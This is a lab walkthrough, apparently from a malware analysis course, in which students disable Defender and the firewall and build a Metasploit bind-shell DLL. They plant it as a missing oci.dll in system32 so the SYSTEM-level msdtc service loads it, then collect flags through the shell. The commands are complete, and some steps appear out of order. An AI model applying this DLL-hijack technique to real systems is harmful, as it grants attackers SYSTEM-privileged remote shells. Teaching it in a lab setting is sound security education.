PMA 41: Windows 10 with Analysis Tools
If you are using the Windows Machine with Tools, skip all the steps in this gray box.
Disable Windows DefenderMake sure you have disabled Windows Defender in Local Group Policy, as explained in project PMA 40.
Installing the Metasploit FrameworkIn Firefox, go to
In the "Installing Metasploit on Windows" section, click the "latest Windows installer" link.
Note: On June 24, 2021, I found that version 6.0.49 did not work. Using the previous version from the link below did work.
Put the metasploitframework-latest.msi file in your Downloads folder.
RIght-click the metasploitframework-latest.msi file and click Properties. Click Unblock. Click OK. Open an Administrator Command Prompt and execute these commands:Click through the installer, accepting all the default options.
cd \Users\IEuser\Downloads metasploitframework-latest.msi
The DLL is created, as shown below.
C:\metasploit-framework\bin\msfvenom -p windows/x64/shell_bind_tcp -f dll -o shellbind.dll
In the lower center, click Public network.
Turn the firewall off.
Find the "Distributed Transaction Coordinator" service, as shown below.
From the description, you can see that this process is not important, and from the Status, you can see that it starts automatically.
Right-click "Distributed Transaction Coordinator" and click Properties. Click the "Log On" tab. Here you can see that this processes runs as System, the highest possible privileges.
If it's not System, but something else, like Network Service Account, change it to "Local System Account, as shown below.
Click OK. Click OK again.
At the lower left of the desktop, click the magnifying glass. Type PROCMON and open procmon.
Configure the two filters shown at the top of the list below and click OK.
In Services, start the "Distributed Transaction Coordinator" service.
Find the oci.dll entry, as shown below. This DLL was not found. This is a defect in Windows 10, which we will exploit.
In Process Monitor, in the toolbar, click the third icon (the magnifying glass) to stop the monitoring.
Find the msdtc.exe process and click it, as shown below.
From the menu bar, click View, "Show Lower Pane". Then click View, "Lower Pane View", DLLs.
This process uses many DLLs, but oci.dll is missing, as shown below.
net stop msdtc copy shellbind.dll c:\windows\system32\oci.dll
Then click the third icon (the magnifying glass) to start monitoring.
In the Administrator Command Prompt window, execute this command:
Now the oci.dll file loads as shown below.
net start msdtc
PMA 124.1: Detail (10 pts)The flag is in the Detail field for the first event for oci.dll, covered by a green rectangle in the image below.
PMA 124.2: Using the Shell (5 pts)Open a new Command Prompt window, and execute these commands:The flag is in covered by a green rectangle in the image below.
ncat 127.0.0.1 4444 whoami
Open Resource Monitor and, on the Network tab, check to see if a process is listening on port 4444, as shown below.
When I did it, the PID was 3200.
If a process is listening on that port, end it in Task Manager,on the Details tab, as shown below.
Then, in an Administrator Command Prompt, execute this command:
Windows Defender adjustments added 3-23-2021
Reference to PMA 40 for disabling Windows Defender added instead 6-6-2021
Metasploit version specified 6-24-2021
Windows 10 with Tools Notes added 8-7-21